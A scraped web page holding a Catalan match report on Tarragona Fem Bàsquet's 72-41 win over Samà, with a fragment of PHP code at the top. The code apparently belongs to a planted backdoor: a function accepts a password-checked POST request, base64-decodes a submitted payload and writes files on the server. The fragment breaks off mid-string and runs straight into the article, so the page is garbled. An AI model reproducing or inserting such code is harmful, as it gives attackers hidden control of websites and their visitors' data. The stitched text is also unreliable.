function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Tarragona Fem Bàsquet derrota el Samà i suma el primer triomf de la segona fase (72-41) - Tgn Bàsquet Club -

El Tarragona Fem Bàsquet derrota el Samà i suma el primer triomf de la segona fase (72-41)

Updated: febrer 27, 2016

Era un partit marcat amb foc al calendari. Si el Tarragona Fem Bàsquet volia tenir aspiracions d’evitar el descens directe i, fins i tot, el playoff de descens, havia de vèncer el Samà. I ho va fer. El conjunt de Vilanova tenia dues victòries més que les tarragonines abans del matx, totes quatre de la primera fase del campionat perquè en el primer partit va perdre a casa contra el Bencriada amb contundència.

Conscients de la importància de l’enfrontament, les noies que entrena Albert Del Rey van sortir molt fortes a pista, amb una concentració que, per cert, es va mantenir tot el matx. Aquesta vegada no va aparèixer la temuda davallada de les segones meitats i no ho va fer perquè l’equip va jugar a bon nivell des de l’inici, marcant diferències, establint rols dins la pista, jugant amb autoritat.

El Tarragona Fem Bàsquet va aprofitar el gran moment de Livy Fouty (10 punts, 12 rebots i 19 de valoració en només 21 minuts de joc), que va ser absolutament imparable sota el cèrcol per unes jugadores rivals amb menys envergadura i que, tot i intentar fer l’ajuda al pal baix, no van poder amb la nord-americana que, a més, va poder trobar unes sòcies perfectes en les seves companyes de perímetre, que van estar especialment inspirades. D’aquesta manera, la defensa del Samà no va saber reaccionar. Tancant-se sobre Fouty deixaven posicions clares de tir des de la línia de 6,75 i Tierno, Pascual i Laura Vilamajor, bombardejaven. Especialment destacable va ser el paper d’aquestes últilmes, les capitanes, que van donar una lliçó de compromís i encert quan calia. De fet, Pascual va retrobar els seus millors minuts sobre la pista, fent un gran partit (24 de valoració, la més alta dels dos equips). Així, la base lila va anotar, a més, un triple de més de 8 metres sobre la botzina abans del descans fins i tot (34-18). L’estadística no enganya: 8/21 triples les locals, una de les millors estadístiques en aquest apartat de la temporada. Fins i tot Ona Fort va sumar-se a la festa.

En el primer quart, el Tarragona Fem Bàsquet va sortir disposat a deixar les coses clares. A la meitat del període la diferència era de 8 punts (14-6) i la sensació de control total. Douglas va fer els seus 5 punts en aquest període i Fouty manava dins la zona. I, molt important, tres triples en aquest quart (Tierno, Pascual i Laura Vilamajor), 20-8.

En el segon període, el domini es va accentuar. El Samà arribava tard en cada acció ofensiva rival -bona circulació de pilota de les tarragonines, que tenien les idees molt clares- i, en atac, no tenia la clarividència necessària i fallava els pocs tirs còmodes que va trobar. Gran part de culpa del mal partit ofensiu visitant la té la bona defensa de les noies d’Albert del Rey. El tècnic va llegir bé els moviments i les virtuts ofensives del Samà i va situar a cada moment la defensa més adient. Les jugadores liles, concentrades com estaven, van arribar sempre a temps a l’ajuda i, a més, van tancar bé el rebot. L’anotació visitant arribava amb comptagotes mentre que el Tarragona Fem Bàsquet, ben dirigit per Pascual, que va trobar en Tierno la seva substituta ideal en la direcció de joc, va arribar al descans amb més 16 a favor seu (34-18).

El tercer quart va ser una continuació del que s’havia vist fins aleshores. Una cistella de Fouty i un dos més un de Laura Vilamajor disparaven la diferència als 19 punts (39-20). Les visitants van decidir endurir la seva defensa, ser més agressives i, almenys, van evitar que la distància envers el seu rival augmentés massa (53-32 al final del tercer quart).

La victòria semblava que no corria perill. La diferència era gran però la principal amenaça per a les locals era la relaxació i deixar escapar la possibilitat d’aconseguir un resultat molt favorable que pogués ser clau al final de temporada, pensant en possibles empats a la classificació. Va haver-hi moments d’imprecisions (25 pilotes perdudes del Tarragona Fem Bàsquet) però el Samà continuava amb problemes ofensius (58-35, 6:56 per finalitzar el matx). Quan semblava que la diferència quedaria estabilitzada, un final pletòric de les tarragonines, que van demostrar estar en una forma física excel·lent, va servir per ampliar l’avantatge i deixar-lo en el 72-41 que va ser, a més, la màxima diferència del partit.